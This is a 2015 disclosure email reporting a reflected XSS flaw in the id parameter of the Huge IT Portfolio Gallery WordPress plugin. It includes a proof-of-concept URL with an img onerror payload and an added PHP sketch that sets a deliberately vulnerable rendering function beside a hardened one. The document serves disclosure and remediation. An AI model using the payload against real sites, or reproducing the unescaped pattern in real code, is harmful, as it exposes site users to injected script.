Subject: Cross-Site Scripting (XSS) in Huge IT Portfolio Gallery 1.5.7
Date: Mon, 24 Aug 2015 11:52:20 +0200

Hello,

Plugin: Huge IT Portfolio Gallery 1.5.7 https://wordpress.org/plugins/portfolio-gallery/

1. Reflected Cross-Site Scripting (XSS) 

Authenticated users (like editors) can inject HTML/JS code (there is no CSRF protection).

Method: GET
URL: http://localhost/wp-admin/admin.php?page=portfolios_huge_it_portfolio&task=edit_cat&id=[xss]
Vulnerable parameters: id

Example PHP callstack:
Html_editportfolio   [/portfolio-gallery/admin/portfolios_view.php:372]

Verification:
http://localhost/wp-admin/admin.php?page=portfolios_huge_it_portfolio&task=edit_cat&id=1%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E


--
Regards,
Marcin Probola,
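
Added example, not part of the original post and not the plugin's code: a stand-alone PHP sketch of the pattern the report implies for the `id` parameter, next to a hardened form. The advisory does not show the code at portfolios_view.php:372, so the markup and both function names are hypothetical, and it is an assumption (based on the `">` breakout in the verification URL) that the value lands inside an HTML attribute.

```php
<?php
// Illustration only; markup and function names are hypothetical, not taken from the plugin.

// Vulnerable pattern: the request value is concatenated into an attribute unescaped.
function render_id_field_vulnerable(string $id): string
{
    return '<input type="hidden" name="id" value="' . $id . '" />';
}

// Hardened pattern: validate the id as a positive integer, then still escape it
// for the attribute context so the output stays safe if validation is ever loosened.
function render_id_field_hardened(string $id): string
{
    $valid = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($valid === false) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    return '<input type="hidden" name="id" value="'
        . htmlspecialchars((string) $valid, ENT_QUOTES, 'UTF-8') . '" />';
}

// URL-decoded value of the id parameter from the Verification URL in the advisory.
$payload = '1"><img src=x onerror=alert(1) />';

// The quote in the payload closes the value attribute, so the <img> tag becomes markup.
echo render_id_field_vulnerable($payload), PHP_EOL;

// The same input fails integer validation and never reaches the page.
try {
    echo render_id_field_hardened($payload), PHP_EOL;
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

// A legitimate id renders normally.
echo render_id_field_hardened('1'), PHP_EOL;
```

Inside WordPress the corresponding helpers are `absint()` for validation and `esc_attr()` for output escaping. The missing CSRF protection noted in the report is normally addressed with a nonce on the admin link, checked with `check_admin_referer()` before the task runs.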